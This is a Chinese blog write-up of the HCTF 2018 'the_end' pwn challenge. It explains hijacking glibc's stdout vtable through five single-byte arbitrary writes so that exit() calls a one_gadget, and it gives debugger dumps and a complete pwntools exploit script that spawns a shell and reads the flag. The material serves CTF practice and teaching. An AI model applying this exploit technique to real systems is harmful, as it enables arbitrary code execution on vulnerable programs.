hctf[pwn] the-end

最新推荐文章于 2024-02-21 16:56:24 发布
最新推荐文章于 2024-02-21 16:56:24 发布
阅读量1.9k 收藏 1
点赞数 1
分类专栏: 漏洞利用技巧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/83999718
版权 
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  signed int i; // [rsp+4h] [rbp-Ch]
  void *buf; // [rsp+8h] [rbp-8h]

  sleep(0);
  printf("here is a gift %p, good luck ;)\n", &sleep);
  fflush(_bss_start);
  close(1);
  close(2);
  for ( i = 0; i <= 4; ++i )
  {
    read(0, &buf, 8uLL);
    read(0, buf, 1uLL);
  }
  exit(1337);
}

代码很简单首先是2个close
0表示stdin,1表示stdout,2表示stderr。
这里关闭了输出和错误流。在循环里面有一个任意地址写但是限制了写入最多5个字节。
程序中给出了libc的地址,可以找到stdin,stdout,stderr的地址。

pwndbg> print stdin
$1 = (struct _IO_FILE *) 0x7ffff7dd18e0 <_IO_2_1_stdin_>
pwndbg> print _IO_2_1_stdin_
$2 = {
  file = {
    _flags = 0xfbad2088, 
    _IO_read_ptr = 0x0, 
    _IO_read_end = 0x0, 
    _IO_read_base = 0x0, 
    _IO_write_base = 0x0, 
    _IO_write_ptr = 0x0, 
    _IO_write_end = 0x0, 
    _IO_buf_base = 0x0, 
    _IO_buf_end = 0x0, 
    _IO_save_base = 0x0, 
    _IO_backup_base = 0x0, 
    _IO_save_end = 0x0, 
    _markers = 0x0, 
    _chain = 0x0, 
    _fileno = 0x0, 
    _flags2 = 0x0, 
    _old_offset = 0xffffffffffffffff, 
    _cur_column = 0x0, 
    _vtable_offset = 0x0, 
    _shortbuf = "", 
    _lock = 0x7ffff7dd3790 <_IO_stdfile_0_lock>, 
    _offset = 0xffffffffffffffff, 
    _codecvt = 0x0, 
    _wide_data = 0x7ffff7dd19c0 <_IO_wide_data_0>, 
    _freeres_list = 0x0, 
    _freeres_buf = 0x0, 
    __pad5 = 0x0, 
    _mode = 0x0, 
    _unused2 = '\000' <repeats 19 times>
  }, 
  vtable = 0x7ffff7dd06e0 <_IO_file_jumps>
}

记得之前遇到过伪造vtable劫持程序执行流,回忆一下
参考https://ctf-wiki.github.io/ctf-wiki/pwn/linux/io_file/introduction/
或者看一下https://ctf-wiki.github.io/ctf-wiki/pwn/linux/io_file/introduction/

就是在调用exit函数的时候会先清空流,这些流会以链的形式存放每个流会维持一个上面的结构体。
在清空流的时候会调用vtable里面的

pwndbg> print _IO_file_jumps
$3 = {
  __dummy = 0x0, 
  __dummy2 = 0x0, 
  __finish = 0x7ffff7a869c0 <_IO_new_file_finish>, 
  __overflow = 0x7ffff7a87730 <_IO_new_file_overflow>, 
  __underflow = 0x7ffff7a874a0 <_IO_new_file_underflow>, 
  __uflow = 0x7ffff7a88600 <__GI__IO_default_uflow>, 
  __pbackfail = 0x7ffff7a89980 <__GI__IO_default_pbackfail>, 
  __xsputn = 0x7ffff7a861e0 <_IO_new_file_xsputn>, 
  __xsgetn = 0x7ffff7a85ec0 <__GI__IO_file_xsgetn>, 
  __seekoff = 0x7ffff7a854c0 <_IO_new_file_seekoff>, 
  __seekpos = 0x7ffff7a88a00 <_IO_default_seekpos>, 
  __setbuf = 0x7ffff7a85430 <_IO_new_file_setbuf>, 
  __sync = 0x7ffff7a85370 <_IO_new_file_sync>, 
  __doallocate = 0x7ffff7a7a180 <__GI__IO_file_doallocate>, 
  __read = 0x7ffff7a861a0 <__GI__IO_file_read>, 
  __write = 0x7ffff7a85b70 <_IO_new_file_write>, 
  __seek = 0x7ffff7a85970 <__GI__IO_file_seek>, 
  __close = 0x7ffff7a85340 <__GI__IO_file_close>, 
  __stat = 0x7ffff7a85b60 <__GI__IO_file_stat>, 
  __showmanyc = 0x7ffff7a89af0 <_IO_default_showmanyc>, 
  __imbue = 0x7ffff7a89b00 <_IO_default_imbue>
}

具体是std三个流中的哪一个还不确定,暂时以stdin作为例子。

上面给出的链接里面说是调用__overflow = 0x7ffff7a87730 <_IO_new_file_overflow>,但是gdb下断点(测试过,并不是因为关闭了2个流)发现并没有调用,原因不清楚。
但是作为一个傲娇的pwn爷爷并不能这样放弃,在_IO_file_jumps结构体里多有函数都下了一个断点(有好多个_IO_2_1_stdin_这种类似结构但是所有的vtable项都会指向一个地址)然后发现第一次断到了__setbuf = 0x7ffff7a85430 <_IO_new_file_setbuf>,地址处,第二次断到了__sync = 0x7ffff7a85370 <_IO_new_file_sync>,地址处。

思路有了:把这个地址替换掉。

分界线

但是发现vtable不能直接写入,那就直接伪造vtable结构但是能写的只有5个字节。
试了一下,发现stdin的_IO_2_1_stdin_结构是可以写的。

修改什么,修改成什么?

pwndbg> print stdin
$4 = (struct _IO_FILE *) 0x7ffff7dd18e0 <_IO_2_1_stdin_>
pwndbg> x /50xg 0x7ffff7dd18e0
0x7ffff7dd18e0 <_IO_2_1_stdin_>:	0x00000000fbad2088	0x0000000000000000
0x7ffff7dd18f0 <_IO_2_1_stdin_+16>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1900 <_IO_2_1_stdin_+32>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1910 <_IO_2_1_stdin_+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1920 <_IO_2_1_stdin_+64>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1930 <_IO_2_1_stdin_+80>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1940 <_IO_2_1_stdin_+96>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd1950 <_IO_2_1_stdin_+112>:	0x0000000000000000	0xffffffffffffffff
0x7ffff7dd1960 <_IO_2_1_stdin_+128>:	0x0000000000000000	0x00007ffff7dd3790
0x7ffff7dd1970 <_IO_2_1_stdin_+144>:	0xffffffffffffffff	0x0000000000000000
0x7ffff7dd1980 <_IO_2_1_stdin_+160>:	0x00007ffff7dd19c0	0x0000000000000000
0x7ffff7dd1990 <_IO_2_1_stdin_+176>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd19a0 <_IO_2_1_stdin_+192>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd19b0 <_IO_2_1_stdin_+208>:	0x0000000000000000	0x00007ffff7dd06e0

这里的0x7ffff7dd19b0 <_IO_2_1_stdin_+208>: 0x0000000000000000 0x00007ffff7dd06e0就是vtable的地址,这里把vtable的地址改到_IO_2_1_stdin_只需要2个字节,可以实现。
接下来需要确定__setbuf = 0x7ffff7a85430 <_IO_new_file_setbuf>,_IO_file_jumps的偏移。在_IO_2_1_stdout_+64+8地址处到0x7ffff7dd1980 <_IO_2_1_stdin_+160>: 0x00007ffff7dd19c0 0x0000000000000000的距离刚好和_IO_file_jumps开始到setbuf的偏移是一样的(为什么要选取)0x7ffff7dd1980 <_IO_2_1_stdin_+160>: 0x00007ffff7dd19c0下面会说。

第一个问题解决了,需要把stdin里面的vtable指针修改为_IO_2_1_stdout_+64+8

p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xd8))
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+64+8)[0])
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xd9))
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+64+8)[1])

接下来是修改0x7ffff7dd1980 <_IO_2_1_stdin_+160>: 0x00007ffff7dd19c0为one-gadget的地址。
现在知道为什么选这个地址了吧,因为选这里只需要修改3个字节就能修改成需要的地址(写入的地址只需要2个条件1、有写权限。2、修改3个字节就能写入一个lib库中的函数地址)。

p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xa0))
p.send(p64(sys_addr)[0])
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xa1))
p.send(p64(sys_addr)[1])
#gdb.attach(p)
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xa2))

接下来下一个问题来了,具体要复写哪一个流,测试后发现只有stdout可以劫持到程序执行流。
还有一个问题是获取到shell的one-gadget这里记录一个很有用的one-gadget
用ida加载库文件搜索字符串
在这里插入图片描述
找到第一个引用
在这里插入图片描述
黄色的地址处
这个one-gadget调试运行结果
在这里插入图片描述
但是不知道原因,在这个题里面无法获取到shell,尝试了所有的one-gadget之后还好出题人心不黑。
最后请教大佬(感谢)解决了shell命令执行后因为stdin关闭没办法回显的问题cat flag>&0
再次感谢大佬指点^_^

总结:其实pwn不需要固定的套路,一个思路,或者一个想法,重要的是动手来调试,测试。接下来就是过河搭桥了。

from pwn import *


cmd="cat flag>&0"


#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("./libc64.so")
p=process("./the_end")

context.log_level='debug'

#sys_off=0x000000000004520F
sys_off=0xf02b0

p.recvuntil("gift ")
A_sleep=int(p.recv(14),16)
print "A_sleep="+hex(A_sleep)


libc.address=A_sleep-libc.symbols["sleep"]
sys_addr=libc.address+sys_off
print "system addr="+hex(sys_addr)

print hex(libc.symbols["_IO_2_1_stdin_"])

p.recvuntil("\n")
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xd8))
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+64+8)[0])
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xd9))
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+64+8)[1])


p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xa0))
p.send(p64(sys_addr)[0])
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xa1))
p.send(p64(sys_addr)[1])
gdb.attach(p)
p.send(p64(libc.symbols["_IO_2_1_stdout_"]+0xa2))
p.send(p64(sys_addr)[2])
p.sendline(cmd)
p.interactive()
九层台
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1470
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
CTFpwn入门学习04
最新发布
2301_79880074的博客
02-21 565
通过两道例题学习一下格式化字符串漏洞的两种方法。
看雪CTF 拯救单身狗 apwn
snowleopard_bin的博客
03-28 695
漏洞类型 堆的整数负数溢出 保护机制 全保护 关键代码 if ( two[v1] )//没考虑负数 { puts("Oh,singledog,changing your name can bring you good luck."); read(0, (void *)two[v1], 0x20uLL); printf("new name: %s", two[...
pwn的一些技巧与总结
weixin_30477797的博客
09-27 846
原文地址:https://github.com/Naetw/CTF-pwn-tips 目录 溢出 在gdb中寻找字符串 二进制服务 找到libc中特定函数的偏移地址 Find '/bin/sh' or 'sh' in library Leak stack address gdb中的fork问题 Secret of a mysterious section - .tls Predictable R...
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2192
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
HCTF-xorgame&theend详细wp
Peanuts
11-12 2093
Hctf-xorgame&amp;theend详细wp 本文首发于安全客 这次比赛只做出了这两个题,其中我觉的the_end的思路还是可以借鉴一下的。 xor_game 文件分析 题目给出了两个文件一个是加密脚本,一个是加密后输出的文件。打开加密的脚本,就能看出和2017suctf的一个题目很像。 加密脚本 from Crypto.Util.strxor import strx...
HCTF2018 pwn题复现
weixin_30585437的博客
11-14 383
相关文件位置 https://gitee.com/hac425/blog_data/tree/master/hctf2018 the_end 程序功能为,首先 打印出 libc 的地址, 然后可以允许任意地址写 5 字节。 解法一 在调用 exit 函数时, 最终在 ld.so 里面的 _dl_fini 函数会使用 0x7ffff7de7b2e <_dl_fini+126>: ...
IO_FILE:2018 HCTF the_end
Mira_Hu的博客
02-13 1629
kips: libc2.23 标准输入输出 定义顺序 #define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \ static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \ struct _IO_FILE_plus NAME \ = {FILEBUF_LITERAL(CHAI...
跟着CTF-wiki学pwn——前言
qq_42882717的博客
06-18 1245
对于有一定pwn基础的同学来讲,CTF-wiki就是yyds,绝绝子,很上头呀。不过简洁有力的另一方面,是细节不彻底,因此本系列文章专为解决CTF-wiki的细节问题
IO_FILE hack 修改vtable
qq_46441427的博客
08-19 266
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 IO_file hackIO调用的vtable函数freadfwritefclose思路例题2018 HCTF the end分析思路:利用 IO调用的vtable函数 fread _IO_sgetn函数调用了vtable的_IO_file_xsgetn。 _IO_doallocbuf函数调用了vtable的_IO_file_doallocate以初始化输入缓冲区。 vtable中的_IO_file_doallocate调用了vtable中
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
ret2dlresolve利用方法
九层台
05-10 2304
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
堆中获取地址和劫持执行流的方法
九层台
09-02 1962
栗子https://github.com/tower111/software.git 0x01获取栈地址 详细writeup:https://tower111.github.io/2018/08/30/ISG-babynote/ 原理:在fast bin是单链在内存中保存,在fd位置处会写入next chunk的地址,这个地址可以用来获取heap_base。 栗子:babynote 需要...
hctf[pwn]babyprintf_ver2
九层台
11-15 784
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg&gt; print $rbx + $rax $1 = 0x555555756011 pwndbg&gt; x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
pwnable(echo2)【64位格式化字符串&uaf】
九层台
01-26 660
和echo1差不多都没开启任何保护,有一个格式化字符串漏洞 64位格式化字符串和32位有些不同64位寄存器是靠寄存器来传参的(说白了格式化字符串就是打印参数的值,或者向参数位置指向的地址处写入数据) 64位寄存器传参的顺序: rdi, rsi, rdx, rcx, r8, r9 这是执行printf时候的状态。 这个是输出的数据 0x1cd605f,0x7f81ace85790,0x70252...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值